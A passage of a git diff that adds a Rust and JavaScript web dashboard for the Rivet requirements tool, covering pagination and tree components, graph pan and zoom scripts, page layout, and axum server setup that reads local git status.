"); + html +} + +// ── Pagination ────────────────────────────────────────────────────────── + +/// Render pagination controls: « ‹ page N of M › » +pub fn pagination(total_items: usize, params: &ViewParams, base_url: &str) -> String { + let per_page = params.items_per_page(); + let total_pages = total_items.div_ceil(per_page); + let current = params.current_page().min(total_pages).max(1); + + if total_pages <= 1 { + return format!( + "
\ + {} items
", + total_items + ); + } + + let mut html = String::with_capacity(512); + html.push_str( + "
", + ); + + // Helper to make a page link + let page_link = |page: usize, label: &str, enabled: bool| -> String { + if enabled { + let qs = params.to_query_string(&[("page", &page.to_string())]); + format!( + "{label}" + ) + } else { + format!( + "{label}" + ) + } + }; + + html.push_str(&page_link(1, "«", current > 1)); + html.push_str(&page_link( + current.saturating_sub(1).max(1), + "‹", + current > 1, + )); + html.push_str(&format!( + "page {current} of {total_pages}" + )); + html.push_str(&page_link( + (current + 1).min(total_pages), + "›", + current < total_pages, + )); + html.push_str(&page_link(total_pages, "»", current < total_pages)); + html.push_str(&format!( + "({total_items} items)" + )); + + html.push_str("
"); + html +} + +// ── CollapsibleTree ───────────────────────────────────────────────────── + +/// A node in a collapsible tree. +pub struct TreeNode { + /// Unique ID (used in `?open=` param). + pub id: String, + /// HTML content for the summary line. + pub summary_html: String, + /// HTML content shown when expanded. + pub detail_html: String, + /// Child nodes. + pub children: Vec, +} + +/// Render a hierarchical tree with `
/` elements. +/// The `open_ids` set determines which nodes start expanded. +/// Provides "Expand All" / "Collapse All" buttons. +pub fn collapsible_tree( + nodes: &[TreeNode], + open_ids: &[String], + base_url: &str, + params: &ViewParams, +) -> String { + let mut html = String::with_capacity(4096); + + // Expand/Collapse all buttons + let all_ids: Vec<&str> = collect_all_ids(nodes); + let expand_qs = params.to_query_string(&[("open", &all_ids.join(","))]); + let collapse_qs = params.to_query_string(&[("open", "")]); + + html.push_str(&format!( + "" + )); + + render_tree_nodes(&mut html, nodes, open_ids, 0); + html +} + +fn collect_all_ids(nodes: &[TreeNode]) -> Vec<&str> { + let mut ids = Vec::new(); + for node in nodes { + ids.push(node.id.as_str()); + ids.extend(collect_all_ids(&node.children)); + } + ids +} + +fn render_tree_nodes(html: &mut String, nodes: &[TreeNode], open_ids: &[String], depth: usize) { + let indent = depth * 16; + for node in nodes { + let is_open = open_ids.iter().any(|id| id == &node.id); + let open_attr = if is_open { " open" } else { "" }; + + html.push_str(&format!( + "" + )); + html.push_str(&format!( + "{}", + node.summary_html + )); + html.push_str(&format!( + "
{}
", + node.detail_html + )); + + if !node.children.is_empty() { + render_tree_nodes(html, &node.children, open_ids, depth + 1); + } + + html.push_str("
"); + } +} + +// ── Paginate helper ───────────────────────────────────────────────────── + +/// Apply pagination to a slice: returns the page slice and total count. +#[allow(clippy::needless_lifetimes)] +pub fn paginate<'a, T>(items: &'a [T], params: &ViewParams) -> (&'a [T], usize) { + let total = items.len(); + let per_page = params.items_per_page(); + let page = params.current_page(); + let start = (page - 1) * per_page; + if start >= total { + (&[], total) + } else { + let end = (start + per_page).min(total); + (&items[start..end], total) + } +} + +// ── Tests ─────────────────────────────────────────────────────────────── + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn view_params_defaults() { + let p = ViewParams::default(); + assert_eq!(p.current_page(), 1); + assert_eq!(p.items_per_page(), 50); + assert!(p.sort_ascending()); + assert!(p.type_list().is_empty()); + assert!(p.open_list().is_empty()); + } + + #[test] + fn view_params_to_query_string() { + let p = ViewParams { + types: Some("requirement,feature".into()), + sort: Some("id".into()), + dir: Some("desc".into()), + ..Default::default() + }; + let qs = p.to_query_string(&[]); + assert!(qs.contains("types=")); + assert!(qs.contains("sort=id")); + assert!(qs.contains("dir=desc")); + } + + #[test] + fn view_params_override_removes_param() { + let p = ViewParams { + types: Some("requirement".into()), + status: Some("approved".into()), + ..Default::default() + }; + let qs = p.to_query_string(&[("status", "")]); + assert!(!qs.contains("status")); + assert!(qs.contains("types=")); + } + + #[test] + fn view_params_override_replaces_param() { + let p = ViewParams { + page: Some(3), + ..Default::default() + }; + let qs = p.to_query_string(&[("page", "1")]); + assert!(qs.contains("page=1")); + assert!(!qs.contains("page=3")); + } + + #[test] + fn type_list_parsing() { + let p = ViewParams { + types: Some("requirement, feature, hazard".into()), + ..Default::default() + }; + let list = 
p.type_list(); + assert_eq!(list, vec!["requirement", "feature", "hazard"]); + } + + #[test] + fn pagination_single_page() { + let p = ViewParams::default(); + let html = pagination(30, &p, "/artifacts"); + assert!(html.contains("30 items")); + // Should not have page navigation (single page with 50 per_page) + assert!(!html.contains("page ")); + } + + #[test] + fn pagination_multi_page() { + let p = ViewParams { + page: Some(2), + per_page: Some(10), + ..Default::default() + }; + let html = pagination(35, &p, "/artifacts"); + assert!(html.contains("page 2 of 4")); + assert!(html.contains("35 items")); + } + + #[test] + fn paginate_slice() { + let items: Vec = (0..100).collect(); + let p = ViewParams { + page: Some(3), + per_page: Some(20), + ..Default::default() + }; + let (slice, total) = paginate(&items, &p); + assert_eq!(total, 100); + assert_eq!(slice.len(), 20); + assert_eq!(slice[0], 40); + } + + #[test] + fn paginate_last_page_partial() { + let items: Vec = (0..55).collect(); + let p = ViewParams { + page: Some(3), + per_page: Some(20), + ..Default::default() + }; + let (slice, total) = paginate(&items, &p); + assert_eq!(total, 55); + assert_eq!(slice.len(), 15); // 55 - 40 = 15 + } + + #[test] + fn filter_bar_renders_html() { + let types = vec!["requirement".to_string(), "feature".to_string()]; + let statuses = vec!["draft".to_string(), "approved".to_string()]; + let p = ViewParams { + types: Some("requirement".into()), + ..Default::default() + }; + let html = filter_bar(&FilterBarConfig { + base_url: "/artifacts", + available_types: &types, + available_statuses: &statuses, + params: &p, + }); + assert!(html.contains("filter-bar")); + assert!(html.contains("checked")); // requirement should be checked + assert!(html.contains("feature")); // feature checkbox present + assert!(html.contains("Clear")); // clear button + } + + #[test] + fn sortable_table_renders_headers() { + let cols = vec![ + Column { + key: "id".into(), + label: "ID".into(), + sortable: 
true, + }, + Column { + key: "title".into(), + label: "Title".into(), + sortable: true, + }, + ]; + let rows = vec![vec!["REQ-001".into(), "First req".into()]]; + let p = ViewParams { + sort: Some("id".into()), + dir: Some("asc".into()), + ..Default::default() + }; + let html = sortable_table(&TableConfig { + base_url: "/artifacts", + columns: &cols, + rows: &rows, + params: &p, + }); + assert!(html.contains("")); + assert!(html.contains("ID")); // ↑ arrow for ascending sort on id + assert!(html.contains("REQ-001")); + } + + #[test] + fn collapsible_tree_respects_open_ids() { + let nodes = vec![TreeNode { + id: "H-1".into(), + summary_html: "H-1".into(), + detail_html: "Hazard details".into(), + children: vec![TreeNode { + id: "SC-1".into(), + summary_html: "SC-1".into(), + detail_html: "Constraint details".into(), + children: vec![], + }], + }]; + let p = ViewParams::default(); + let html = collapsible_tree(&nodes, &["H-1".into()], "/stpa", &p); + // H-1 should be open, SC-1 should be closed + assert!(html.contains("
+(function(){ + // ── Loading bar ────────────────────────────────────────── + var bar=document.getElementById('loading-bar'); + if(bar){ + document.body.addEventListener('htmx:beforeRequest',function(){ + bar.classList.remove('done'); + bar.style.width='0'; + void bar.offsetWidth; + bar.classList.add('active'); + }); + document.body.addEventListener('htmx:afterRequest',function(){ + bar.classList.remove('active'); + bar.classList.add('done'); + bar.style.width='100%'; + setTimeout(function(){bar.classList.remove('done');bar.style.width='0'},400); + }); + } + + // ── Nav active state ───────────────────────────────────── + function setActiveNav(url){ + document.querySelectorAll('nav a[hx-get]').forEach(function(a){ + var href=a.getAttribute('hx-get'); + if(url===href || (href!=='/' && url.startsWith(href))){ + a.classList.add('active'); + } else { + a.classList.remove('active'); + } + }); + } + document.body.addEventListener('htmx:afterRequest',function(e){ + var path=e.detail.pathInfo&&e.detail.pathInfo.requestPath; + if(path) setActiveNav(path); + }); + // Set initial active state + document.addEventListener('DOMContentLoaded',function(){ + var p=window.location.pathname; + if(p==='/'||p==='') p='/stats'; + setActiveNav(p); + }); + + // ── Browser back/forward ───────────────────────────────── + window.addEventListener('popstate',function(){ + var p=window.location.pathname; + if(p==='/'||p==='') p='/stats'; + setActiveNav(p); + htmx.ajax('GET',p,'#content'); + }); + + // ── Source line anchor scroll ──────────────────────────── + function scrollToLineAnchor(){ + var h=window.location.hash; + if(h&&h.match(/^#L\d+$/)){ + var el=document.getElementById(h.substring(1)); + if(el){el.scrollIntoView({behavior:'smooth',block:'center'});} + } + } + document.body.addEventListener('htmx:afterSwap',scrollToLineAnchor); + document.addEventListener('DOMContentLoaded',scrollToLineAnchor); + + // ── Pan/zoom ───────────────────────────────────────────── + 
document.addEventListener('htmx:afterSwap', initPanZoom); + document.addEventListener('DOMContentLoaded', initPanZoom); + + function initPanZoom(){ + document.querySelectorAll('.graph-container').forEach(function(c){ + if(c._pz) return; + c._pz=true; + var svg=c.querySelector('svg'); + if(!svg) return; + var vb=svg.viewBox.baseVal; + var origVB={x:vb.x, y:vb.y, w:vb.width, h:vb.height}; + var drag=false, sx=0, sy=0, ox=0, oy=0; + + // Pan (mousedown only — move/up handled in node-drag block) + c.addEventListener('mousedown',function(e){ + if(e.target.closest('.graph-controls')) return; + if(e.target.closest('.node')) return; // let node drag handle it + drag=true; sx=e.clientX; sy=e.clientY; + ox=vb.x; oy=vb.y; e.preventDefault(); + }); + c.addEventListener('mouseleave',function(){ drag=false; }); + + // Zoom with wheel + c.addEventListener('wheel',function(e){ + e.preventDefault(); + var f=e.deltaY>0?1.12:1/1.12; + var r=c.getBoundingClientRect(); + var mx=(e.clientX-r.left)/r.width; + var my=(e.clientY-r.top)/r.height; + var nx=vb.width*f, ny=vb.height*f; + vb.x+=(vb.width-nx)*mx; + vb.y+=(vb.height-ny)*my; + vb.width=nx; vb.height=ny; + },{passive:false}); + + // Touch support + var lastDist=0, lastMid=null; + c.addEventListener('touchstart',function(e){ + if(e.touches.length===1){ + drag=true; sx=e.touches[0].clientX; sy=e.touches[0].clientY; + ox=vb.x; oy=vb.y; + } else if(e.touches.length===2){ + drag=false; + var dx=e.touches[1].clientX-e.touches[0].clientX; + var dy=e.touches[1].clientY-e.touches[0].clientY; + lastDist=Math.sqrt(dx*dx+dy*dy); + lastMid={x:(e.touches[0].clientX+e.touches[1].clientX)/2, + y:(e.touches[0].clientY+e.touches[1].clientY)/2}; + } + },{passive:true}); + c.addEventListener('touchmove',function(e){ + if(e.touches.length===1 && drag){ + e.preventDefault(); + var scale=vb.width/c.clientWidth; + vb.x=ox-(e.touches[0].clientX-sx)*scale; + vb.y=oy-(e.touches[0].clientY-sy)*scale; + } else if(e.touches.length===2){ + e.preventDefault(); + 
var dx=e.touches[1].clientX-e.touches[0].clientX; + var dy=e.touches[1].clientY-e.touches[0].clientY; + var dist=Math.sqrt(dx*dx+dy*dy); + var f=lastDist/dist; + var r=c.getBoundingClientRect(); + var mid={x:(e.touches[0].clientX+e.touches[1].clientX)/2, + y:(e.touches[0].clientY+e.touches[1].clientY)/2}; + var mx=(mid.x-r.left)/r.width; + var my=(mid.y-r.top)/r.height; + var nx=vb.width*f, ny=vb.height*f; + vb.x+=(vb.width-nx)*mx; + vb.y+=(vb.height-ny)*my; + vb.width=nx; vb.height=ny; + lastDist=dist; lastMid=mid; + } + },{passive:false}); + c.addEventListener('touchend',function(){ drag=false; lastDist=0; }); + + // Zoom buttons + var controls=c.querySelector('.graph-controls'); + if(controls){ + controls.querySelector('.zoom-in').addEventListener('click',function(){ + var cx=vb.x+vb.width/2, cy=vb.y+vb.height/2; + vb.width/=1.3; vb.height/=1.3; + vb.x=cx-vb.width/2; vb.y=cy-vb.height/2; + }); + controls.querySelector('.zoom-out').addEventListener('click',function(){ + var cx=vb.x+vb.width/2, cy=vb.y+vb.height/2; + vb.width*=1.3; vb.height*=1.3; + vb.x=cx-vb.width/2; vb.y=cy-vb.height/2; + }); + controls.querySelector('.zoom-fit').addEventListener('click',function(){ + vb.x=origVB.x; vb.y=origVB.y; vb.width=origVB.w; vb.height=origVB.h; + }); + } + + // ── Node dragging + click ────────────────────────────── + var dragNode=null, dnSX=0, dnSY=0, dnOX=0, dnOY=0, dnMoved=false; + var nodeOffsets={}; // id -> {dx,dy} + + function getNodeCenter(node){ + var r=node.querySelector('rect'); + if(!r) return {x:0,y:0}; + var x=parseFloat(r.getAttribute('x'))||0; + var y=parseFloat(r.getAttribute('y'))||0; + var w=parseFloat(r.getAttribute('width'))||0; + var h=parseFloat(r.getAttribute('height'))||0; + var id=node.getAttribute('data-id')||''; + var off=nodeOffsets[id]||{dx:0,dy:0}; + return {x:x+w/2+off.dx, y:y+h/2+off.dy}; + } + + function updateEdges(){ + svg.querySelectorAll('.edge').forEach(function(edge){ + var src=edge.getAttribute('data-source'); + var 
tgt=edge.getAttribute('data-target'); + var srcOff=nodeOffsets[src]||{dx:0,dy:0}; + var tgtOff=nodeOffsets[tgt]||{dx:0,dy:0}; + var path=edge.querySelector('path'); + if(!path) return; + var origD=path.getAttribute('data-orig-d'); + if(!origD){ origD=path.getAttribute('d'); path.setAttribute('data-orig-d',origD); } + // Parse path points and offset them + var newD=offsetPath(origD,srcOff,tgtOff); + path.setAttribute('d',newD); + // Move label + var lbg=edge.querySelector('.label-bg'); + var ltxt=edge.querySelector('text'); + if(lbg){ + var ox=lbg.getAttribute('data-orig-x'); + if(!ox){ ox=lbg.getAttribute('x'); lbg.setAttribute('data-orig-x',ox); + var oy=lbg.getAttribute('y'); lbg.setAttribute('data-orig-y',oy); } + var avgDx=(srcOff.dx+tgtOff.dx)/2; + var avgDy=(srcOff.dy+tgtOff.dy)/2; + lbg.setAttribute('x',parseFloat(lbg.getAttribute('data-orig-x'))+avgDx); + lbg.setAttribute('y',parseFloat(lbg.getAttribute('data-orig-y'))+avgDy); + } + if(ltxt){ + var otx=ltxt.getAttribute('data-orig-x'); + if(!otx){ otx=ltxt.getAttribute('x'); ltxt.setAttribute('data-orig-x',otx); + var oty=ltxt.getAttribute('y'); ltxt.setAttribute('data-orig-y',oty); } + var avgDx2=(srcOff.dx+tgtOff.dx)/2; + var avgDy2=(srcOff.dy+tgtOff.dy)/2; + ltxt.setAttribute('x',parseFloat(ltxt.getAttribute('data-orig-x'))+avgDx2); + ltxt.setAttribute('y',parseFloat(ltxt.getAttribute('data-orig-y'))+avgDy2); + } + }); + } + + function offsetPath(d,srcOff,tgtOff){ + // SVG path: M x y, L x y, C x y x y x y, etc. 
+ // Split into commands and offset first point by srcOff, last by tgtOff, middle interpolated + var tokens=d.match(/[MLCQZ]|[-]?[\d.]+/gi); + if(!tokens) return d; + var pts=[]; + var i=0; + while(i1?j/(n-1):0; + pts[j].x+= srcOff.dx*(1-frac)+tgtOff.dx*frac; + pts[j].y+= srcOff.dy*(1-frac)+tgtOff.dy*frac; + } + // Rebuild + var out=''; + for(var j=0;j2||Math.abs(dy)>2) dnMoved=true; + var nid=dragNode.getAttribute('data-id')||''; + nodeOffsets[nid]={dx:dnOX+dx, dy:dnOY+dy}; + dragNode.setAttribute('transform','translate('+nodeOffsets[nid].dx+','+nodeOffsets[nid].dy+')'); + updateEdges(); + return; // don't pan while dragging a node + } + if(!drag) return; + var scale2=vb.width/c.clientWidth; + vb.x=ox-(e.clientX-sx)*scale2; + vb.y=oy-(e.clientY-sy)*scale2; + }); + c.addEventListener('mouseup',function(){ + if(dragNode){ dragNode.style.cursor='grab'; dragNode=null; } + drag=false; + }); + + // Fit to container on first load with some padding + var padding=40; + vb.x=-padding; vb.y=-padding; + vb.width=origVB.w+padding*2; + vb.height=origVB.h+padding*2; + origVB={x:vb.x, y:vb.y, w:vb.width, h:vb.height}; + }); + } + + // ── Artifact hover preview tooltip ─────────────────────── + (function(){ + var tip=document.createElement('div'); + tip.className='art-tooltip'; + document.body.appendChild(tip); + var timer=null, ctrl=null, currentEl=null; + + function show(el){ + var href=el.getAttribute('hx-get')||''; + var m=href.match(/^\/artifacts\/(.+)$/); + if(!m) return; + var id=m[1]; + if(ctrl) ctrl.abort(); + ctrl=new AbortController(); + fetch('/artifacts/'+encodeURIComponent(id)+'/preview',{signal:ctrl.signal,headers:{'HX-Request':'true'}}) + .then(function(r){return r.text()}) + .then(function(html){ + tip.innerHTML=html; + tip.classList.add('visible'); + position(el); + }).catch(function(){}); + } + + function position(el){ + var r=el.getBoundingClientRect(); + var tw=tip.offsetWidth, th=tip.offsetHeight; + var left=r.left+r.width/2-tw/2; + var top=r.top-th-6; + 
if(top<4){ top=r.bottom+6; } + if(left<4) left=4; + if(left+tw>window.innerWidth-4) left=window.innerWidth-tw-4; + tip.style.left=left+'px'; + tip.style.top=top+window.scrollY+'px'; + } + + function hide(){ + clearTimeout(timer); timer=null; + if(ctrl){ ctrl.abort(); ctrl=null; } + tip.classList.remove('visible'); + currentEl=null; + } + + document.body.addEventListener('mouseenter',function(e){ + var el=e.target.closest('[hx-get^="/artifacts/"]'); + if(!el||el.getAttribute('hx-get').indexOf('/preview')!==-1) return; + currentEl=el; + timer=setTimeout(function(){ show(el); },300); + },true); + + document.body.addEventListener('mouseleave',function(e){ + var el=e.target.closest('[hx-get^="/artifacts/"]'); + if(el&&el===currentEl) hide(); + },true); + + // also hide when clicking (navigating away) + document.body.addEventListener('click',function(){ hide(); },true); + })(); + + // ── SVG viewer: fullscreen / popout / zoom-fit ────────────── + window.svgFullscreen=function(btn){ + var viewer=btn.closest('.svg-viewer'); + if(!viewer) return; + viewer.classList.toggle('fullscreen'); + var isFS=viewer.classList.contains('fullscreen'); + btn.textContent=isFS?'\u2715':'\u26F6'; + btn.title=isFS?'Exit fullscreen':'Fullscreen'; + }; + + window.svgPopout=function(btn){ + var viewer=btn.closest('.svg-viewer'); + if(!viewer) return; + var svg=viewer.querySelector('svg'); + if(!svg) return; + var popup=window.open('','_blank','width=1200,height=800'); + var doc=popup.document; + doc.open(); + var style=doc.createElement('style'); + style.textContent='body{margin:0;background:#fafbfc;display:flex;align-items:center;justify-content:center;min-height:100vh} svg{max-width:95vw;max-height:95vh}'; + doc.head.appendChild(style); + doc.title='Rivet Graph'; + doc.body.appendChild(svg.cloneNode(true)); + doc.close(); + }; + + window.svgZoomFit=function(btn){ + var viewer=btn.closest('.svg-viewer'); + if(!viewer) return; + var container=viewer.querySelector('.graph-container'); + var 
svg=viewer.querySelector('svg'); + if(!svg) return; + // Trigger the existing zoom-fit button if present + if(container){ + var fitBtn=container.querySelector('.zoom-fit'); + if(fitBtn){ fitBtn.click(); return; } + } + // Fallback: reset viewBox from bounding box + var bbox=svg.getBBox(); + var pad=40; + svg.setAttribute('viewBox', + (bbox.x-pad)+' '+(bbox.y-pad)+' '+(bbox.width+pad*2)+' '+(bbox.height+pad*2)); + }; + + document.addEventListener('keydown',function(e){ + if(e.key==='Escape'){ + document.querySelectorAll('.svg-viewer.fullscreen').forEach(function(v){ + v.classList.remove('fullscreen'); + var btn=v.querySelector('.svg-viewer-toolbar button[title="Exit fullscreen"]'); + if(btn){ btn.textContent='\u26F6'; btn.title='Fullscreen'; } + }); + } + }); +})(); + +"#; + +pub const SEARCH_JS: &str = r#" + +"#; + +pub const AADL_JS: &str = r#" + +"#; diff --git a/rivet-cli/src/serve/layout.rs b/rivet-cli/src/serve/layout.rs new file mode 100644 index 0000000..1c1ccc3 --- /dev/null +++ b/rivet-cli/src/serve/layout.rs @@ -0,0 +1,245 @@ +use axum::response::Html; + +use super::js::{AADL_JS, GRAPH_JS, SEARCH_JS}; +use super::styles::CSS; +use super::{AppState, html_escape}; +use rivet_core::schema::Severity; +use rivet_core::validate; + +/// Render content in print-friendly layout (no nav, no HTMX, no JS). +pub(crate) fn print_layout(content: &str, state: &AppState) -> Html { + Html(format!( + r##" + + + + +{project} — Rivet + + + + + + +
{content}
+ +"##, + project = html_escape(&state.context.project_name), + )) +} + +pub(crate) fn page_layout(content: &str, state: &AppState) -> Html { + let artifact_count = state.store.len(); + let diagnostics = validate::validate(&state.store, &state.schema, &state.graph); + let error_count = diagnostics + .iter() + .filter(|d| d.severity == Severity::Error) + .count(); + let error_badge = if error_count > 0 { + format!("{error_count}") + } else { + "OK".to_string() + }; + let doc_badge = if !state.doc_store.is_empty() { + format!("{}", state.doc_store.len()) + } else { + String::new() + }; + let result_badge = if !state.result_store.is_empty() { + format!( + "{}", + state.result_store.len() + ) + } else { + String::new() + }; + let stpa_types = [ + "loss", + "hazard", + "sub-hazard", + "system-constraint", + "controller", + "controlled-process", + "control-action", + "uca", + "controller-constraint", + "loss-scenario", + ]; + let stpa_count: usize = stpa_types + .iter() + .map(|t| state.store.count_by_type(t)) + .sum(); + let stpa_nav = if stpa_count > 0 { + format!( + "
  • STPA{stpa_count}
  • " + ) + } else { + String::new() + }; + let version = env!("CARGO_PKG_VERSION"); + + // Context bar + let ctx = &state.context; + let git_html = if let Some(ref git) = ctx.git { + let status = if git.is_dirty { + format!( + "{} uncommitted", + git.dirty_count + ) + } else { + "clean".to_string() + }; + format!( + "/\ + {branch}@{commit}\ + {status}", + branch = html_escape(&git.branch), + commit = html_escape(&git.commit_short), + ) + } else { + String::new() + }; + // Project switcher: show siblings as a dropdown if available + let switcher_html = if ctx.siblings.is_empty() { + String::new() + } else { + let mut s = String::from( + "\ +
    \ + \ +
    ", + ); + for sib in &ctx.siblings { + s.push_str(&format!( + "
    \ + {}\ + rivet -p {} serve -P {}\ +
    ", + html_escape(&sib.name), + html_escape(&sib.rel_path), + ctx.port, + )); + } + s.push_str("
    "); + s + }; + let context_bar = format!( + "
    \ + {project}{switcher_html}\ + /\ + {path}\ + {git_html}\ + Loaded {loaded_at}\ + \ + \ +
    ", + project = html_escape(&ctx.project_name), + path = html_escape(&ctx.project_path), + loaded_at = html_escape(&ctx.loaded_at), + ); + Html(format!( + r##" + + + + +Rivet Dashboard + + + + + + + + +
    +
    + +
    +{context_bar} +
    +{content} + +
    +
    +
    +
    +
    +
    + 🔍 + +
    +
    +
    Type to search artifacts and documents
    +
    +
    +
    +{GRAPH_JS} +{SEARCH_JS} +{AADL_JS} + +"## + )) +} diff --git a/rivet-cli/src/serve/mod.rs b/rivet-cli/src/serve/mod.rs new file mode 100644 index 0000000..050338a --- /dev/null +++ b/rivet-cli/src/serve/mod.rs @@ -0,0 +1,941 @@ +use std::collections::HashMap; +use std::path::PathBuf; +use std::sync::Arc; + +use anyhow::{Context as _, Result}; +use axum::Router; +use axum::extract::{Path, State}; +use axum::response::IntoResponse; +use axum::routing::{get, post}; +use tokio::sync::RwLock; + +/// Embedded WASM/JS assets for single-binary distribution. +/// Only available when built with `--features embed-wasm` and assets exist. +#[cfg(feature = "embed-wasm")] +mod embedded_wasm { + pub const SPAR_JS: &str = include_str!("../../assets/wasm/js/spar_wasm.js"); + pub const CORE_WASM: &[u8] = include_bytes!("../../assets/wasm/js/spar_wasm.core.wasm"); + pub const CORE2_WASM: &[u8] = include_bytes!("../../assets/wasm/js/spar_wasm.core2.wasm"); + pub const CORE3_WASM: &[u8] = include_bytes!("../../assets/wasm/js/spar_wasm.core3.wasm"); +} + +#[allow(dead_code)] +pub(crate) mod components; +mod js; +mod layout; +mod styles; +mod views; + +use layout::page_layout; +use rivet_core::document::DocumentStore; +use rivet_core::links::LinkGraph; +use rivet_core::results::ResultStore; +use rivet_core::schema::Schema; +use rivet_core::store::Store; + +// ── Repository context ────────────────────────────────────────────────── + +/// Git repository status captured at load time. +struct GitInfo { + branch: String, + commit_short: String, + is_dirty: bool, + dirty_count: usize, +} + +/// A discovered sibling project (example or peer). +struct SiblingProject { + name: String, + rel_path: String, +} + +/// Project context shown in the dashboard header. 
+struct RepoContext { + project_name: String, + project_path: String, + git: Option, + loaded_at: String, + siblings: Vec, + port: u16, +} + +fn capture_git_info(project_path: &std::path::Path) -> Option { + let branch = std::process::Command::new("git") + .args(["rev-parse", "--abbrev-ref", "HEAD"]) + .current_dir(project_path) + .output() + .ok() + .filter(|o| o.status.success()) + .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string())?; + + let commit_short = std::process::Command::new("git") + .args(["rev-parse", "--short", "HEAD"]) + .current_dir(project_path) + .output() + .ok() + .filter(|o| o.status.success()) + .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) + .unwrap_or_default(); + + let porcelain = std::process::Command::new("git") + .args(["status", "--porcelain"]) + .current_dir(project_path) + .output() + .ok() + .filter(|o| o.status.success()) + .map(|o| String::from_utf8_lossy(&o.stdout).to_string()) + .unwrap_or_default(); + + let dirty_count = porcelain.lines().filter(|l| !l.is_empty()).count(); + + Some(GitInfo { + branch, + commit_short, + is_dirty: dirty_count > 0, + dirty_count, + }) +} + +/// Discover other rivet projects (examples/ and peer directories). 
+fn discover_siblings(project_path: &std::path::Path) -> Vec { + let mut siblings = Vec::new(); + + // Check examples/ subdirectory + let examples_dir = project_path.join("examples"); + if examples_dir.is_dir() + && let Ok(entries) = std::fs::read_dir(&examples_dir) + { + for entry in entries.flatten() { + let p = entry.path(); + if p.join("rivet.yaml").exists() + && let Some(name) = p.file_name().and_then(|n| n.to_str()) + { + siblings.push(SiblingProject { + name: name.to_string(), + rel_path: format!("examples/{name}"), + }); + } + } + } + + // If inside examples/, offer root project and peers + if let Some(parent) = project_path.parent() + && parent.file_name().and_then(|n| n.to_str()) == Some("examples") + && let Some(root) = parent.parent() + { + if root.join("rivet.yaml").exists() + && let Ok(cfg) = std::fs::read_to_string(root.join("rivet.yaml")) + { + let root_name = cfg + .lines() + .find(|l| l.trim().starts_with("name:")) + .map(|l| l.trim().trim_start_matches("name:").trim().to_string()) + .unwrap_or_else(|| { + root.file_name() + .and_then(|n| n.to_str()) + .unwrap_or("root") + .to_string() + }); + siblings.push(SiblingProject { + name: root_name, + rel_path: root.display().to_string(), + }); + } + // Peer examples + if let Ok(entries) = std::fs::read_dir(parent) { + for entry in entries.flatten() { + let p = entry.path(); + if p != project_path + && p.join("rivet.yaml").exists() + && let Some(name) = p.file_name().and_then(|n| n.to_str()) + { + siblings.push(SiblingProject { + name: name.to_string(), + rel_path: p.display().to_string(), + }); + } + } + } + } + + siblings.sort_by(|a, b| a.name.cmp(&b.name)); + siblings +} + +/// Shared application state loaded once at startup. +struct AppState { + store: Store, + schema: Schema, + graph: LinkGraph, + doc_store: DocumentStore, + result_store: ResultStore, + context: RepoContext, + /// Canonical path to the project directory (for reload). 
+ project_path_buf: PathBuf, + /// Path to the schemas directory (for reload). + schemas_dir: PathBuf, + /// Resolved docs directories (for serving images/assets). + doc_dirs: Vec, +} + +/// Convenience alias so handler signatures stay compact. +type SharedState = Arc>; + +/// Build a fresh `AppState` by loading everything from disk. +fn reload_state( + project_path: &std::path::Path, + schemas_dir: &std::path::Path, + port: u16, +) -> Result { + let config_path = project_path.join("rivet.yaml"); + let config = rivet_core::load_project_config(&config_path) + .with_context(|| format!("loading {}", config_path.display()))?; + + let schema = rivet_core::load_schemas(&config.project.schemas, schemas_dir) + .context("loading schemas")?; + + let mut store = Store::new(); + for source in &config.sources { + let artifacts = rivet_core::load_artifacts(source, project_path) + .with_context(|| format!("loading source '{}'", source.path))?; + for artifact in artifacts { + store.upsert(artifact); + } + } + + let graph = LinkGraph::build(&store, &schema); + + let mut doc_store = DocumentStore::new(); + let mut doc_dirs = Vec::new(); + for docs_path in &config.docs { + let dir = project_path.join(docs_path); + if dir.is_dir() { + doc_dirs.push(dir.clone()); + } + let docs = rivet_core::document::load_documents(&dir) + .with_context(|| format!("loading docs from '{docs_path}'"))?; + for doc in docs { + doc_store.insert(doc); + } + } + + let mut result_store = ResultStore::new(); + if let Some(ref results_path) = config.results { + let dir = project_path.join(results_path); + let runs = rivet_core::results::load_results(&dir) + .with_context(|| format!("loading results from '{results_path}'"))?; + for run in runs { + result_store.insert(run); + } + } + + let git = capture_git_info(project_path); + let loaded_at = std::process::Command::new("date") + .arg("+%H:%M:%S") + .output() + .ok() + .filter(|o| o.status.success()) + .map(|o| 
String::from_utf8_lossy(&o.stdout).trim().to_string()) + .unwrap_or_else(|| "unknown".into()); + let siblings = discover_siblings(project_path); + let project_name = config.project.name.clone(); + + let context = RepoContext { + project_name, + project_path: project_path.display().to_string(), + git, + loaded_at, + siblings, + port, + }; + + Ok(AppState { + store, + schema, + graph, + doc_store, + result_store, + context, + project_path_buf: project_path.to_path_buf(), + schemas_dir: schemas_dir.to_path_buf(), + doc_dirs, + }) +} + +/// Start the axum HTTP server on the given port. +#[allow(clippy::too_many_arguments)] +pub async fn run( + store: Store, + schema: Schema, + graph: LinkGraph, + doc_store: DocumentStore, + result_store: ResultStore, + project_name: String, + project_path: PathBuf, + schemas_dir: PathBuf, + doc_dirs: Vec, + port: u16, +) -> Result<()> { + let git = capture_git_info(&project_path); + let loaded_at = std::process::Command::new("date") + .arg("+%H:%M:%S") + .output() + .ok() + .filter(|o| o.status.success()) + .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) + .unwrap_or_else(|| "unknown".into()); + let siblings = discover_siblings(&project_path); + let context = RepoContext { + project_name, + project_path: project_path.display().to_string(), + git, + loaded_at, + siblings, + port, + }; + + let state: SharedState = Arc::new(RwLock::new(AppState { + store, + schema, + graph, + doc_store, + result_store, + context, + project_path_buf: project_path, + schemas_dir, + doc_dirs, + })); + + let app = Router::new() + .route("/", get(views::index)) + .route("/artifacts", get(views::artifacts_list)) + .route("/artifacts/{id}", get(views::artifact_detail)) + .route("/artifacts/{id}/preview", get(views::artifact_preview)) + .route("/artifacts/{id}/graph", get(views::artifact_graph)) + .route("/validate", get(views::validate_view)) + .route("/matrix", get(views::matrix_view)) + .route("/graph", get(views::graph_view)) + 
